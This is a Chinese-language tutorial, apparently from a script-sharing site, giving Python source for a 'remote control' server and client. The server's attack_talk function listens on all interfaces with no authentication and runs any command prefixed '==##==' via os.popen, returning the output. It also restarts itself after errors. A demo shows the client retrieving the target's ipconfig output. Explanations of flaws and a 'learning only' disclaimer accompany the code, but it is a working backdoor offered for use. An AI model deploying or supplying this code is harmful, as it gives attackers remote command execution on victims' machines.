遠(yuǎn)控服務(wù)端—源碼

聲明：筆記的只是方便各位師傅學(xué)習(xí)知識(shí)，以下代碼、網(wǎng)站只涉及學(xué)習(xí)內(nèi)容，其他的都與本人無(wú)關(guān)，切莫逾越法律紅線，否則后果自負(fù)。

import socket
import os
 
 
# 核心思路：客戶端發(fā)送一條特殊字符串，里面包含要執(zhí)行的命令，讓服務(wù)器端執(zhí)行命令并返回給客戶端
def normal_talk():
    s = socket.socket()
    s.bind(('0.0.0.0', 55555))  # 不區(qū)分ip，所有ip均可訪問(wèn)
    s.listen()
    chanel, client = s.accept()  # 無(wú)法接受多個(gè)客戶端
    # 死循環(huán)后的代碼不可執(zhí)行
    while True:
        # chanel, client = s.accept()  # 此時(shí)的accept會(huì)置于阻塞狀態(tài)
        receive = chanel.recv(1024).decode()
        print(f"收到消息是：{receive}")
        reply = receive.replace("嗎？", "!")
        chanel.send(reply.encode())
 
 
def attack_talk():
    try:
        s = socket.socket()
        s.bind(('0.0.0.0', 55555))
        s.listen()
        chanel, client = s.accept()
        while True:
            receive = chanel.recv(10240).decode()
            # ==##==,command
            if receive.startswith('==##=='):
                command = receive.split(',')[-1]
                reply = os.popen(command).read()
                chanel.send(f"命令{command}的運(yùn)行結(jié)果：\n{reply}".encode())
            else:
                print(f"收到消息是：{receive}")
                reply = receive.replace("嗎？", "!")
                chanel.send(reply.encode())
    except:
        s.close()
        attack_talk()
 
 
if __name__ == '__main__':
    attack_talk()

遠(yuǎn)控服務(wù)端—源碼解析

這段代碼實(shí)現(xiàn)了一個(gè)簡(jiǎn)單的基于TCP的遠(yuǎn)程命令執(zhí)行服務(wù)器和客戶端通信模型。以下是對(duì)代碼的詳細(xì)分析：

功能概述

normal_talk(): 一個(gè)基本的回顯服務(wù)器，接收客戶端發(fā)送的消息，將“嗎？”替換為“!”后返回。

attack_talk(): 一個(gè)具有遠(yuǎn)程命令執(zhí)行功能的服務(wù)器，能夠接收特定格式的消息（以==##==開頭），解析并執(zhí)行其中的命令，然后將執(zhí)行結(jié)果返回給客戶端。如果接收到的消息不是命令，則進(jìn)行簡(jiǎn)單的文本替換并回顯。

代碼分析

導(dǎo)入模塊

import socket
import os

socket: 用于網(wǎng)絡(luò)通信，創(chuàng)建TCP/IP套接字。

os: 提供操作系統(tǒng)相關(guān)的功能，這里用于執(zhí)行系統(tǒng)命令。

normal_talk() 函數(shù)

def normal_talk():
    s = socket.socket()
    s.bind(('0.0.0.0', 55555))  # 綁定到所有IP的55555端口
    s.listen()
    chanel, client = s.accept()  # 接受一個(gè)客戶端連接
    while True:
        receive = chanel.recv(1024).decode()
        print(f"收到消息是：{receive}")
        reply = receive.replace("嗎？", "!")
        chanel.send(reply.encode())

綁定與監(jiān)聽: 服務(wù)器綁定到所有可用的IP地址（0.0.0.0）的55555端口，并開始監(jiān)聽連接請(qǐng)求。

接受連接: s.accept()會(huì)阻塞，直到有客戶端連接進(jìn)來(lái)，返回一個(gè)新的套接字對(duì)象chanel和客戶端地址client。

消息處理: 進(jìn)入無(wú)限循環(huán)，接收客戶端發(fā)送的消息，打印出來(lái)，將“嗎？”替換為“!”后發(fā)送回客戶端。

問(wèn)題點(diǎn):

只能處理一個(gè)客戶端連接，無(wú)法同時(shí)處理多個(gè)客戶端。

缺乏異常處理，如果連接中斷或其他錯(cuò)誤發(fā)生，程序可能會(huì)崩潰。

attack_talk() 函數(shù)

def attack_talk():
    try:
        s = socket.socket()
        s.bind(('0.0.0.0', 55555))
        s.listen()
        chanel, client = s.accept()
        while True:
            receive = chanel.recv(10240).decode()
            if receive.startswith('==##=='):
                command = receive.split(',')[-1]
                reply = os.popen(command).read()
                chanel.send(f"命令{command}的運(yùn)行結(jié)果：\n{reply}".encode())
            else:
                print(f"收到消息是：{receive}")
                reply = receive.replace("嗎？", "!")
                chanel.send(reply.encode())
    except:
        s.close()
        attack_talk()

功能擴(kuò)展: 除了基本的文本替換功能外，增加了遠(yuǎn)程命令執(zhí)行的能力。

命令解析: 如果接收到的消息以==##==開頭，則認(rèn)為后面跟隨的是要執(zhí)行的命令。使用split(',')分割字符串，提取命令部分。

命令執(zhí)行: 使用os.popen(command).read()執(zhí)行命令并獲取輸出結(jié)果。

結(jié)果返回: 將命令執(zhí)行的結(jié)果格式化后發(fā)送回客戶端。

異常處理與重試機(jī)制: 使用try-except捕獲可能的異常（如連接中斷），關(guān)閉當(dāng)前套接字后遞歸調(diào)用attack_talk()重新啟動(dòng)服務(wù)器。

嚴(yán)重問(wèn)題點(diǎn):

安全性漏洞: 該服務(wù)器允許任意客戶端發(fā)送命令并執(zhí)行，可能導(dǎo)致嚴(yán)重的安全風(fēng)險(xiǎn)，如被惡意利用進(jìn)行遠(yuǎn)程攻擊、數(shù)據(jù)泄露等。

缺乏輸入驗(yàn)證: 沒有對(duì)接收到的命令進(jìn)行任何形式的驗(yàn)證或過(guò)濾，容易受到注入攻擊。

遞歸調(diào)用風(fēng)險(xiǎn): 在異常情況下遞歸調(diào)用attack_talk()可能導(dǎo)致棧溢出，尤其是在頻繁發(fā)生異常的情況下。

資源管理不當(dāng): 每次異常發(fā)生時(shí)僅關(guān)閉當(dāng)前套接字，但未確保其他資源（如線程、進(jìn)程等）的正確釋放。

阻塞操作: s.accept()和chanel.recv()都是阻塞操作，缺乏多線程或多進(jìn)程支持，無(wú)法高效處理多個(gè)客戶端連接。

主程序入口

if __name__ == '__main__':
    attack_talk()

當(dāng)腳本作為主程序運(yùn)行時(shí)，調(diào)用attack_talk()函數(shù)啟動(dòng)服務(wù)器。

總結(jié)與建議

安全性: 遠(yuǎn)程命令執(zhí)行功能極其危險(xiǎn)，除非在受控且安全的環(huán)境中使用，否則應(yīng)避免在生產(chǎn)環(huán)境中部署此類服務(wù)器。

功能改進(jìn):

多客戶端支持: 使用多線程或多進(jìn)程來(lái)處理多個(gè)客戶端連接，提高服務(wù)器的并發(fā)能力。

輸入驗(yàn)證與過(guò)濾: 對(duì)接收到的命令進(jìn)行嚴(yán)格的驗(yàn)證和過(guò)濾，防止注入攻擊和其他安全漏洞。

異常處理優(yōu)化: 改進(jìn)異常處理機(jī)制，避免遞歸調(diào)用帶來(lái)的風(fēng)險(xiǎn)，確保資源的正確釋放。

日志記錄: 添加日志記錄功能，便于監(jiān)控服務(wù)器運(yùn)行狀態(tài)和排查問(wèn)題。

合法合規(guī): 確保服務(wù)器的使用符合相關(guān)法律法規(guī)和組織政策，避免非法用途。

總之，這段代碼展示了基本的網(wǎng)絡(luò)通信和遠(yuǎn)程命令執(zhí)行的實(shí)現(xiàn)方式，但由于存在嚴(yán)重的安全隱患，不建議在不了解其潛在風(fēng)險(xiǎn)的情況下使用。

遠(yuǎn)控控制端—源碼

import socket
 
s = socket.socket()
s.connect(('需要操控的ipv4地址', 55555))
while True:
    massage = input("請(qǐng)輸入消息：")
    s.send(massage.encode())
    receive = s.recv(10240)
    print(f"服務(wù)器回復(fù)：{receive.decode()}")

遠(yuǎn)控控制端—源碼解析

這段代碼是一個(gè)簡(jiǎn)單的Python客戶端程序，用于通過(guò)網(wǎng)絡(luò)套接字（socket）與服務(wù)器進(jìn)行通信。下面是對(duì)代碼的詳細(xì)分析：

導(dǎo)入模塊

import socket

這行代碼導(dǎo)入了Python標(biāo)準(zhǔn)庫(kù)中的socket模塊，該模塊提供了用于網(wǎng)絡(luò)通信的接口。

創(chuàng)建套接字

s = socket.socket()

這行代碼創(chuàng)建了一個(gè)新的套接字對(duì)象s。默認(rèn)情況下，這個(gè)套接字是一個(gè)TCP套接字，因?yàn)閟ocket.socket()在Python 3中默認(rèn)創(chuàng)建的是AF_INET（IPv4）和SOCK_STREAM（TCP）類型的套接字。

連接到服務(wù)器

s.connect(('127.0.0.1', 55555))

這行代碼嘗試連接到指定的服務(wù)器地址和端口。'127.0.0.1'是本地回環(huán)地址，表示客戶端將連接到運(yùn)行在同一臺(tái)機(jī)器上的服務(wù)器。55555是服務(wù)器監(jiān)聽的端口號(hào)。

消息發(fā)送與接收循環(huán)

while True:
    massage = input("請(qǐng)輸入消息：")
    s.send(massage.encode())
    receive = s.recv(10240)
    print(f"服務(wù)器回復(fù)：{receive.decode()}")

這段代碼是一個(gè)無(wú)限循環(huán)，用于不斷地從用戶那里接收輸入，發(fā)送給服務(wù)器，并打印服務(wù)器的回復(fù)。

massage = input("請(qǐng)輸入消息：")：這行代碼提示用戶輸入一條消息，并將輸入的字符串存儲(chǔ)在變量massage中。

s.send(massage.encode())：這行代碼將用戶輸入的消息編碼為字節(jié)串（因?yàn)閟end方法需要字節(jié)串作為參數(shù)），然后通過(guò)套接字發(fā)送給服務(wù)器。

receive = s.recv(10240)：這行代碼從服務(wù)器接收數(shù)據(jù)。recv方法的參數(shù)10240指定了接收緩沖區(qū)的大小，即最多接收10240字節(jié)的數(shù)據(jù)。服務(wù)器發(fā)送的數(shù)據(jù)將被存儲(chǔ)在變量receive中。

print(f"服務(wù)器回復(fù)：{receive.decode()}")：這行代碼將接收到的字節(jié)串?dāng)?shù)據(jù)解碼為字符串（默認(rèn)使用UTF-8編碼），然后打印出來(lái)。f字符串用于格式化輸出，將解碼后的服務(wù)器回復(fù)嵌入到字符串中。

注意事項(xiàng)

這個(gè)客戶端程序假設(shè)服務(wù)器會(huì)在同一臺(tái)機(jī)器上運(yùn)行，并且監(jiān)聽55555端口。如果服務(wù)器運(yùn)行在不同的機(jī)器上，你需要將'127.0.0.1'替換為服務(wù)器的實(shí)際IP地址。

這個(gè)程序沒有異常處理。在實(shí)際應(yīng)用中，你應(yīng)該添加try-except塊來(lái)處理可能出現(xiàn)的網(wǎng)絡(luò)錯(cuò)誤，例如連接失敗、發(fā)送或接收數(shù)據(jù)時(shí)出錯(cuò)等。

這個(gè)程序在接收到服務(wù)器關(guān)閉連接信號(hào)（即recv返回空字符串）時(shí)不會(huì)退出循環(huán)。你可能需要添加邏輯來(lái)檢測(cè)這種情況并優(yōu)雅地退出程序。

這個(gè)程序沒有提供退出機(jī)制。在實(shí)際應(yīng)用中，你可能希望添加一個(gè)命令（如輸入"exit"）來(lái)允許用戶退出程序。

安全性考慮

這個(gè)簡(jiǎn)單的客戶端-服務(wù)器模型沒有加密通信，因此不適合傳輸敏感信息。在生產(chǎn)環(huán)境中，你應(yīng)該使用SSL/TLS等加密技術(shù)來(lái)保護(hù)數(shù)據(jù)傳輸。

這個(gè)程序沒有身份驗(yàn)證機(jī)制，任何人都可以連接到服務(wù)器并發(fā)送命令。在實(shí)際應(yīng)用中，你需要實(shí)現(xiàn)適當(dāng)?shù)纳矸蒡?yàn)證機(jī)制來(lái)確保只有授權(quán)用戶才能訪問(wèn)服務(wù)器。

演示效果

服務(wù)端命令：python server.py
控制端命令：python client.py

可以看到client端輸入==##==,ipconfig就返回了服務(wù)端的ip信息。

以上就是python遠(yuǎn)控代碼的教程詳解的詳細(xì)內(nèi)容，更多關(guān)于python遠(yuǎn)控代碼的資料請(qǐng)關(guān)注腳本之家其它相關(guān)文章！

最新評(píng)論